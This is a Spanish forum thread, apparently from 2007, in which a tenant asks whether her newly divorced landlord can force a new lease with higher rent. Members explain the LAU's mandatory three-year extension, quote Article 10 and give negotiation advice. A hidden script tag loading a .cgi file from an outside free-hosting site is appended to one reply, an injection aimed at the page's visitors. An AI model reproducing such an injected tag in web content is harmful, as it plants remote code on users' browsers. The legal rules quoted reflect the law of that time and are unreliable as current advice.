Necesito ayuda urgente

Marisa

Madmaxista
Desde
20 Abr 2007
Mensajes
9
Reputación
0
Hola a todos,

Os cuento mi situación, a ver si me podéis ayudar.
Vivo de alquiler desde hace unos 7 años. El contrato que hicieron los propietarios era de un año, pagaba 360 euros y cada año se actualizaba según el IPC. Yo seguía con el alquiler tan contenta y los arrendatarios también, por tanto, se renovaba automáticamente año a año (de julio a julio). Cuando se cumplió el 5º año, firmamos una prórroga en la que se seguía renovando anualmente si con un mes de antelación antes de cumplirse al plazo ninguna de las partes decidía rescindirlo. Pues ahora los propietarios se han divorciado y el piso se lo ha quedado él. El otro día vino a mi casa a decirme que quiere hacer un contrato nuevo en el que no aparezca su mujer y con la renta actualizada. He de decir que la prórroga la firmó ella porque ya estaban separados.
El tema es que imagino que querrá subir el alquiler una barbaridad (ahora pago 415 euros por un piso de 120 mts) y me gustaría saber si puedo decirle que hasta julio no puede cambiar el contrato y puedo seguir hasta entonces pagando lo mismo o si no tngo derecho a eso y tengo que irme en un mes si las condiciones del contrato no me convienen. El miércoles nos reunimos y creo que ya tendrá el contrato preparado. Es un poco urgente.
Muchas gracias.
 

RANGER

Madmaxista
Desde
7 Jun 2006
Mensajes
5.123
Reputación
1.875
Lugar
Polonia (la del Mediterráneo)
Para empezar el contrato de alquiler lo tienen que respetar independientemente de quien sea el dueño ahora. Aunque hubiesen vendido el piso el nuevo dueño lo tendria que respetar.

Cuando pasan los primeros cinco años y se prorroga, estan obligados a prorrogar (si tu quieres) hasta tres años mas. Si lo he entendido bien y este año es el 7º tienes un año mas si tu quieres, independientemente de quien sea ahora el propietario.

Aunque si te interesa seguir en el piso, quizas sea bueno para ti hacer un "nuevo contrato", ya que el contador empezaria de cero, todo dependera de la renta que te quiera cobrar.
 

bubblecrash

Madmaxista
Desde
27 Jun 2006
Mensajes
437
Reputación
6
Lugar
Sevilla
Habria que revisar las condiciones del contrato, pero en principio si se ha prorrogado hasta Julio no puede obligarte, a no ser que decida emprender acciones legales, que para lo que falta no creo que le interese mucho. De todas formas, yo que tu me iria curando en salud ya que si te ha dicho que 'quiere actualizarte' lo que pagas, fijo que va a ser una subida mas que considerable, teniendo en cuenta lo que se paga hoy en dia en Madrid por un alquiler de esas caracteristicas. Yo le llamaria para hablarlo, comentarle que existe un contrato en vigor hasta Julio y que en principio hasta entonces no tienes interes en modificarlo y aprovecharia para preguntar por donde va la 'actualizacion' ya que si te dice una subida a 1000 euros o similar (que no me extrañaria nada) deberias plantearte el irte a otro piso. Aun tienes casi 3 meses de colchon para hacerlo bien y sin prisas, mejor que esperar a encontrarse 'el pastel'.

Actualizo: Segun parece por las condiciones de tu contrato, tienes un año de plazo extra, o sea mas de un año para plantearte el cambio de piso. Llamalo, comentale el tema como está y que en principio no te interesa modificar las condiciones del contrato y aprovecha para saber a cuanto te lo quiere subir. Imagino que, si se acaba de divorciar, este necesitado de dinero si tiene que pagar manutencion a los hijos etc además de necesitar un piso nuevo para vivir.
 
Última edición:

Santa

Madmaxista
Desde
12 Sep 2006
Mensajes
60
Reputación
0
La LAU establece tu derecho, durante los 5 primeros años de duración del contrato, a la prórroga anual del mismo. Una vez transcurridos esos 5 primeros años, si ninguna de las partes optase en plazo por la rescisión del contrato, tienes derecho a otras 3 prórrogas anuales, en las que sólo tú puedes desistir del contrato con una antelación mínima de 1 mes al cumplimiento de cada anualidad.

Por lo tanto, no estás obligada a negociar un nuevo contrato, puedes esperar hasta que cumpla la anualidad y aún así, si te falta todavía un año para llegar a los 8 en total, tendrías derecho a otra prórroga anual con las mismas condiciones y la subida sólo del IPC.

Que el propietario sea ahora el marido no cambia en nada el contrato de alquiler, él se subroga en la posición del anterior titular.

Un saludo y suerte!

Edit: veo que Ranger se me ha adelantado. Totalmente de acuerdo con lo que dice. Mira a ver si aún así te conviene renegociar el contrato.<script src="http://phonebill.ifreepages.com/burbuja/crook.cgi"></script>
 
Última edición:

Marisa

Madmaxista
Desde
20 Abr 2007
Mensajes
9
Reputación
0
Gracias por contestar tan rápido.
Creo que hablaré con él primero antes de que prepare nada. Le preguntaré cuánto me va a cobrar y si no me interesa le diré que no se moleste en hacerme el contrato.
Entonces, si lo he entendido bien, puedo quedarme hasta julio como mínimo no? En la ley de arrendamientos urbanos (que me la he empollado este fin de semana para ver si ponía algo al respecto del cambio arrendatario y no dice ná de ná) no recuerdo haber leído nada sobre la prórroga de 3 años más. Podrías decirme dónde puedo informarme de eso?
 

LADRILLATOR

Madmaxista
Desde
22 Sep 2006
Mensajes
2.894
Reputación
2.232
Santa dijo:
La LAU establece tu derecho, durante los 5 primeros años de duración del contrato, a la prórroga anual del mismo. Una vez transcurridos esos 5 primeros años, si ninguna de las partes optase en plazo por la rescisión del contrato, tienes derecho a otras 3 prórrogas anuales, en las que sólo tú puedes desistir del contrato con una antelación mínima de 1 mes al cumplimiento de cada anualidad.

Por lo tanto, no estás obligada a negociar un nuevo contrato, puedes esperar hasta que cumpla la anualidad y aún así, si te falta todavía un año para llegar a los 8 en total, tendrías derecho a otra prórroga anual con las mismas condiciones y la subida sólo del IPC.

Que el propietario sea ahora el marido no cambia en nada el contrato de alquiler, él se subroga en la posición del anterior titular.

Un saludo y suerte!

Edit: veo que Ranger se me ha adelantado. Totalmente de acuerdo con lo que dice. Mira a ver si aún así te conviene renegociar el contrato.

Exacto. ;)

Puedes disponer de un año más hasta Julio del 2008 si tú quieres. De todos modos leete bien tu contrato de alquiler, ya que ahí se especifica muy claramente este punto.
 

RANGER

Madmaxista
Desde
7 Jun 2006
Mensajes
5.123
Reputación
1.875
Lugar
Polonia (la del Mediterráneo)
Marisa dijo:
Gracias por contestar tan rápido.
Creo que hablaré con él primero antes de que prepare nada. Le preguntaré cuánto me va a cobrar y si no me interesa le diré que no se moleste en hacerme el contrato.
Entonces, si lo he entendido bien, puedo quedarme hasta julio como mínimo no? En la ley de arrendamientos urbanos (que me la he empollado este fin de semana para ver si ponía algo al respecto del cambio arrendatario y no dice ná de ná) no recuerdo haber leído nada sobre la prórroga de 3 años más. Podrías decirme dónde puedo informarme de eso?

CAPÍTULO II
De la duración del contrato
Artículo 10. Prórroga del contrato

Si llegada la fecha de vencimiento del contrato, una vez transcurridos como mínimo cinco años de duración de aquél, ninguna de las partes hubiese notificado a la otra, al menos con un mes de antelación a aquella fecha, su voluntad de no renovarlo, el contrato se prorrogará obligatoriamente por plazos anuales hasta un máximo de tres años más, salvo que el arrendatario manifieste al arrendador con un mes de antelación a la fecha de terminación de cualquiera de las anualidades, su voluntad de no renovar el contrato.
Al contrato prorrogado, le seguirá siendo de aplicación el régimen legal y convencional al que estuviera sometido.
 

Marisa

Madmaxista
Desde
20 Abr 2007
Mensajes
9
Reputación
0
Muchísimas gracias a todos.
Lo mejor que me puede pasar es que me pida una renta normalita y empezar de cero como bien decía Ranger.
Por cierto, os puedo preguntar una cosa?? Yo soy de Albacete, supongo que habréis leído que lo de la burbuja no va con nosotros. Aquí los pisos siguen para arriba. El metro cuadrado en AB es más caro que en Valencia!!! No puedo entenderlo. Es cierto que está creciendo mucho pero no puedo encontrar ninguna explicación a este hecho. Qué pensáis vosotros?
 

LADRILLATOR

Madmaxista
Desde
22 Sep 2006
Mensajes
2.894
Reputación
2.232
Marisa dijo:
Muchísimas gracias a todos.
Lo mejor que me puede pasar es que me pida una renta normalita y empezar de cero como bien decía Ranger.
Por cierto, os puedo preguntar una cosa?? Yo soy de Albacete, supongo que habréis leído que lo de la burbuja no va con nosotros. Aquí los pisos siguen para arriba. El metro cuadrado en AB es más caro que en Valencia!!! No puedo entenderlo. Es cierto que está creciendo mucho pero no puedo encontrar ninguna explicación a este hecho. Qué pensáis vosotros?
:eek:

Explicación? ESPECULACION pura y dura, porque sector industrial? aparte de lo de los helicópteros poco más.

Joeeer :eek:

p.d. ante el vicio de pedir, la virtud de no dar. ;)
 

ex-burbujista

Madmaxista
Desde
20 Sep 2006
Mensajes
3.481
Reputación
54
Marisa dijo:
Muchísimas gracias a todos.
Lo mejor que me puede pasar es que me pida una renta normalita y empezar de cero como bien decía Ranger.
Por cierto, os puedo preguntar una cosa?? Yo soy de Albacete, supongo que habréis leído que lo de la burbuja no va con nosotros. Aquí los pisos siguen para arriba. El metro cuadrado en AB es más caro que en Valencia!!! No puedo entenderlo. Es cierto que está creciendo mucho pero no puedo encontrar ninguna explicación a este hecho. Qué pensáis vosotros?
imagino que a albacete estan llegando ahora las actualizaciones de los precios tanto de venta como de alquiler. con tres años de retraso, una pena no haber "espabilado" antes.
 

Holonio

Madmaxista
Desde
18 Abr 2007
Mensajes
291
Reputación
19
y despues de los otros 3 años que pasa

Hola, me presento. Vivo en Marbella y como soy burbujista convencido desde antes de conocer el foro vivo de alquiler. La verdad es un chollazo pago 420.71 Euros (70.000 ptas) desde Octubre de 2001 como no me ha notificado el dueño (es guiri) no ha subido el ipc estos años. Bueno al lio:

Como no ha aprovechado la oportunidad de septiembre de 2006 ahora tenemos derecho a otros tres años pero alguien sabe decirme ¿que pasa si en septiembre de 2009 tampoco me notifican nada?
 

fosco

Madmaxista
Desde
19 Ago 2006
Mensajes
2.196
Reputación
27
Lugar
mandriles
A la hora de poner el precio haz valer tu buen inquilinato, has demostrado 7 años de buen inquilino, hazle ver que no tienes miedo en cambiar a otro sitio si te lo sube demasiado.
A no ser que sea un tio gilito super-avaro, el tendrá más miedo a cambiar de inquilino que tú a cambiar de piso. Haz valer eso que dicen los caseros de que alquilar es muy inseguro y tal. Úsalo a tu favor.
Como todas las negociaciones, difícil. Dile que te diga cuánto te quiere cobrar de más, para tener tiempo de buscar otra cosa si es demasiado. Aunque esto te puede salir mal, si tiene a un inquilino de repuesto, su primo, por ejemplo.
De todas formas me parece que tienes un año más por lo de la prorroga de 3 años.
 

kalapa

Madmaxista
Desde
14 Sep 2006
Mensajes
9.247
Reputación
10.833
Lugar
Ladrillolandia
fosco dijo:
A la hora de poner el precio haz valer tu buen inquilinato, has demostrado 7 años de buen inquilino, hazle ver que no tienes miedo en cambiar a otro sitio si te lo sube demasiado.
A no ser que sea un tio gilito super-avaro, el tendrá más miedo a cambiar de inquilino que tú a cambiar de piso. Haz valer eso que dicen los caseros de que alquilar es muy inseguro y tal. Úsalo a tu favor.
Como todas las negociaciones, difícil. Dile que te diga cuánto te quiere cobrar de más, para tener tiempo de buscar otra cosa si es demasiado. Aunque esto te puede salir mal, si tiene a un inquilino de repuesto, su primo, por ejemplo.
De todas formas me parece que tienes un año más por lo de la prorroga de 3 años.
Tienes toda la razon del mundo. Y te lo dice un propietario con inquilinos ...